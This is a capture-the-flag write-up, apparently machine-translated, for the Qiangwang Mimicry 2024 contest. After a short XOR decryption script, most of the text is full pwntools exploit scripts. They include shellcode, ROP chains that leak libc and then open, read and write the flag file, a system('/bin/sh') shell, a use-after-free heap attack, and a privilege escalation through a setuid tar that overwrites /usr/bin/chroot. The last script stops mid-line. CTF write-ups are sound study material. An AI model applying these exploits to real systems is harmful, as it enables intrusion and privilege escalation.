Title: Qiangwang Mimicry 2024 wp

Crypto

XOR

1. Open the environment as a string of characters, which can be decoded using an XOR script or an online decoding tool (only one encryption)

The key is mimic

Decrypt the flag

Online decryption

Or script: # ciphertext ciphertext='0b050c0e180e585f5c52555c5544545c0a0f44535f0f5e445658595844050f5d0f0f55590c555e5a0914'# Convert hex string to bytes ciphertext_bytes=bytes.fromhex(ciphertext)# Assuming the key is 'Key', you can change the key key=b'mimic'# XOR decrypt the ciphertext plaintext_bytes=bytes([a ^ b for a, b in zip(ciphertext_bytes, key * (len(ciphertext_bytes) //len(key) + 1))])# Convert the decrypted bytes into a string plaintext=plaintext_bytes.decode('utf-8')print(plaintext)

Pwn

ezcode

Set of json's direct shellcode, limit the length0x16, first realize the mprotect+read within0x16 bytes, and then write orw_shellcode

from pwn import *

import json

context(log_level='debug',os='linux',arch='amd64')

pwnfile='./vuln'

io=process(pwnfile)

#io=remote()

elf=ELF(pwnfile)

libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')

#libc=ELF('./libc.so.6')

shellcode='''

sal edi,12

mov dx,7

mov ax,10

syscall

cdq

xor eax,eax

mov esi,ecx

xor edi,edi

syscall

'''

shellcode1=asm(shellcode)

print('len--',len(shellcode1))

payload1={

'shellcode': shellcode1.hex()

}

io.sendlineafter('Please enter your input:',json.dumps(payload1))

shellcode=asm(''''

mov rdi,0x999800d

xor esi,esi

xor rdx,rdx

mov rax,2

syscall

mov rdi,rax

mov rsi,0x9998000+0x300

mov edx,0x40

xor eax,eax

syscall

mov edi,1

mov rsi,0x9998000+0x300

mov rax,1

syscall

''')

io.sendline(b'./flag\x00\x00\x00'+shellcode)

io.interactive()

signin_revenge

Stack Overflow, no pie, no canary, construct ROP leaked address and then orw

from pwn import *

context(log_level='debug',os='linux',arch='amd64')

pwnfile='./vuln'

#io=process(pwnfile)

io=remote('pwn-16255a8951.challenge.xctf.org.cn', 9999, ssl=True)

elf=ELF(pwnfile)

libc=ELF('./libc.so.6')

def debug():

gdb.attach(io)

pause()

pop_rdi=0x0000000000401393

puts_got=elf.got['puts']

puts_plt=elf.plt['puts']

main_adr=elf.symbols['main']

#debug()

pay=b'a'*0x108+flat(pop_rdi,puts_got,puts_plt,main_adr)

io.sendlineafter('lets move and pwn!\n',pay)

puts_adr=u64(io.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))

libc_base=puts_adr-libc.sym['puts']

pop_rdx=libc_base +0x0000000000142c92

pop_rsi=libc_base +0x0000000000002601f

pop_rbp=libc_base +0x000000000000226c0

pop_rax=libc_base +0x000000000000036174

leave_ret=0x4012EE

read=0x04012D6 #0x130

bss=0x404000+0x800

flag_adr=bss+0x98

op=libc_base + libc.symbols['open']

re=libc_base + libc.symbols['read']

wr=libc_base + libc.symbols['write']

pay=b'a'*0x100+p64(bss-8)+flat(pop_rax,bss,read)

io.sendafter('lets move and pwn!\n',pay)

#debug()

orw=flat(pop_rdi,flag_adr,pop_rsi,0,op,

pop_rdi,3, pop_rsi,flag_adr+0x200,pop_rdx,0x100,re,

pop_rdi,1,pop_rsi,flag_adr+0x200,pop_rdx,0x40,wr)+b'./flag\x00'

io.sendline(orw)

io.interactive()

QWEN

You can write to the memu pointer, and0x20 bytes beyond the bounds.

Then use the backdoor to read /proc/self/maps to obtain memory information, and get two gadgets through libc_base

0x000000000000004ee21 : pop rdx ; add rsp,0x38 ; pop rbx ; pop rbp ; ret

0x0000000000000d10be : xor eax, eax ; add rsp, 8 ; ret

Hijack the menu pointer as pop rdx ; add rsp,0x38 ; pop rbx ; pop rbp ; ret, jump to the0x20 bytes written by read, execute system("/bin/sh") to get the shell

exp

from pwn import *

def debug(c=0):

if(c):

gdb.attach(p, c)

else:

gdb.attach(p)

pause()

def get_sb() : return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))

#-----------------------------------------------------------------------------------------

s=lambda data : p.send(data)

sa=lambda text,data :p.sendafter(text, data)

sl=lambda data :p.sendline(data)

sla=lambda text,data :p.sendlineafter(text, data)

r=lambda num=4096 :p.recv(num)

rl=lambda text :p.recvuntil(text)

pr=lambda num=4096 :print(p.recv(num))

inter=lambda :p.interactive()

l32=lambda :u32(p.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))

l64=lambda :u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))

uu32=lambda :u32(p.recv(4).ljust(4,b'\x00'))

uu64=lambda :u64(p.recv(6).ljust(8,b'\x00'))

int16=lambda data :int(data,16)

lg=lambda s, num :p.success('%s -0x%x' % (s, num))

#-----------------------------------------------------------------------------------------

context(os='linux', arch='amd64', log_level='debug')

p=remote('pwn-bc7e9f0275.challenge.xctf.org.cn', 9999, ssl=True)

#p=process('pwn1')

elf=ELF('pwn1')

libc=ELF('libc.so.6')

#debug('b *$rebase(0x1022)\n')

for i in range(5):

sla(b'\xbc\x89\xef\xbc\x9a', str(i) + ' 0')

pl=b'a'*0x8 + p16(0x1508)

sa(b'say?', pl)

sla(b'game [Y/N]', b'N')

sla(b'\xbc\x89\xef\xbc\x9a', '111 111')

sla(b'administrator key\n', str(0x6b8b4567))

file_name=b'/proc/self/maps'

sla(b'logged in!\n', file_name)

rl(b'The debugging information is as follows \n')

pro_base=int(r(12), 16)

rl(b'libc.so.6\n')

libc_base=int(r(12), 16) -0x1e7000

lg('pro_base', pro_base)

lg('libc_base', libc_base)

for i in range(5):

sla(b'\xbc\x89\xef\xbc\x9a', str(i) + ' 0')

#0x00000000000004ee21 : pop rdx ; add rsp,0x38 ; pop rbx ; pop rbp ; ret

#0x000000000000d10be : xor eax, eax ; add rsp, 8 ; ret

rdi=libc_base +0x0000000000002164f

system, binsh=get_sb()

ret=libc_base +0x0000000000000000008aa

one_gadget=libc_base +0x00000000000004ee21

pl=p64(libc_base +0x000000000000d10be) + p64(one_gadget) + p64(ret) + p64(rdi) + p64(binsh) + p64(system)

sa(b'say?', pl)

sla(b'game [Y/N]', b'N')

sla(b'\xbc\x89\xef\xbc\x9a', '111 1111111111111111111111111111111111111111111111111')

lg('pro_base', pro_base)

lg('libc_base', libc_base)

#pause()

inter() and then escalate power.

pwn2 on the target machine can be decompressed tar, has s permission, and -x can be created and decompressed if -x points to a file that does not exist, and use this function to forge tar, and overwrite the file.

for example

/home/pwn2 -x test.tar will require base64 to enter and locally generated tar package

Since the docker question usually uses xinetd and view the configuration file of xinetd, it uses /usr/bin/chroot to switch from root to ctf users, so modify /usr/bin/chroot to chmox 777 /home/ctf/flag, and then use another terminal nc, trigger chroot pointing to modify flag permission reading

signin

There is a 0_o function in the add function, which has the same stack overflow as signin_revenge. You can use this to hit orw directly.

from pwn import *

import ctypes

from ctypes import *

context(arch='amd64', os='linux', log_level='debug')

file_name='./vuln'

libc=ELF('./libc.so.6')

#libc=ctypes.CDLL('/lib/x86_64-linux-gnu/libc.so.6')

#libc.srand.argtypes=[ctypes.c_uint]

li=lambda x : print('\x1b[01;38;5;214m' + str(x) + '\x1b[0m')

ll=lambda x : print('\x1b[01;38;5;1m' + str(x) + '\x1b[0m')

#context.terminal=['tmux','splitw','-h']

debug=1

if debug:

r=remote('pwn-c9b9d9e4e9.challenge.xctf.org.cn', 9999, ssl=True)

else:

r=process(file_name)

libcc=cdll.LoadLibrary('./libc.so.6')

libcc.srand(libcc.time(0))

elf=ELF(file_name)

def dbg():

gdb.attach(r)

pause()

def dbgg():

raw_input()

r.send('rbp')

for i in range(100):

a=libcc.rand()%100+1

r.sendafter('Input the authentication code:\n',p64(a))

r.sendafter(' \n', p32(1))

#dbg()

r.sendafter('Index: \n', p32(0))

r.sendafter('Note: \n', b'a'*0x10)

sleep(0.5)

r.send(b'a'*0x108+p64(0x401893)+p64(0x404028)+p64(0x401110)+p64(0x4013C0))

libc_base=u64(r.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))-libc.sym['puts']

openn=libc_base+libc.sym['open']

read=libc_base+libc.sym['read']

write=libc_base+libc.sym['write']

rdi=libc_base +0x000000000000023b6a

rsi=libc_base +0x0000000000002601f

rdx=libc_base +0x0000000000142c92

print(hex(libc_base))

r.send(b'a'*0x108+p64(rsi)+p64(0x404180)+p64(read)+p64(0x4013C0))

r.send('flag')

sleep(0.5)

r.send(b'a'*0x100+p64(0x404200)+p64(0x4013CF))

sleep(0.5)

r.send(b'a'*0x100+p64(0x404300)+p64(0x4013CF))

sleep(0.5)

#dbg()

r.send(b'flag\x00\x00\x00\x00'+p64(rdi)+p64(0x404200)+p64(rsi)+p64(0)+p64(rdx)+p64(0)+p64(openn)+p64(rdi)+p64(3)+p64(rsi)+p64(0x4041a0)+p64(rdx)+p64(0x30)+p64(read)+p64(rdi)+p64(rdi)+p64(1)+p64(write))

r.interactive()

guest book

There is uaf in the menu heap program and the application size limit is0x4ff or above. There are no other restrictions, then just put the board and type house of apple

from pwn import *

import sys

context.log_level='debug'

context.arch='amd64'

#libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')

libc=ELF('./libc.so.6')

flag=1

if flag:

p=remote('pwn-ca43b7414f.challenge.xctf.org.cn', 9999, ssl=True)

else:

p=process('./pwn')

sa=lambda s,n : p.sendafter(s,n)

sla=lambda s,n : p.sendlineafter(s,n)

sl=lambda s : p.sendline(s)

sd=lambda s : p.send(s)

rc=lambda n : p.recv(n)

ru=lambda s : p.recvuntil(s)

ti=lambda : p.interactive()

leak=lambda name,addr :log.success(name+'--'+hex(addr))

def dbg():

gdb.attach(p)

pause()

def cmd(choice):

ru('')

sl(str(choice))

def add(index,size):

cmd(1)

ru('index')

sl(str(index))

ru('size')

sl(str(size))

def edit(index,content):

cmd(2)

ru('index')

sl(str(index))

ru('content')

sd(content)

def delete(index):

cmd(3)

ru('index')

sl(str(index))

def show(index):

cmd(4)

ru('index')

sl(str(index))

add(0,0x520)

add(1,0x500)

add(2,0x510)

delete(0)

add(3,0x568)

delete(2)

show(0)

mainarean=u64(ru(b'\x7f')[-6:].ljust(8,b'\x00'))

libc_base=mainarean-0x21b110

edit(0,b'A'*0x10)

show(0)

ru(b'A'*0x10)

heap_base=u64(p.recv(6).ljust(8,b'\x00'))-0x290

edit(0,p64(mainarean)*2)

free_hook=libc_base+libc.sym['__free_hook']

ogs=[0xe3afe,0xe3b01,0xe3b04]

og=libc_base+ogs[1]

puts_io_all=libc_base + libc.sym['_IO_list_all']

wfile=libc_base + libc.sym['_IO_wfile_jumps']

addr=libc.symbols['puts']+libc_base

fake_io_addr=heap_base +0x1720

lock=0x3ed8b0+libc_base

pop_rdi=libc_base + next(libc.search(asm('pop rdi;ret;'))))

pop_rsi=libc_base + next(libc.search(asm('pop rsi;ret;'))))

pop_rdx_r12=libc_base + next(libc.search(asm('pop rdx;pop r12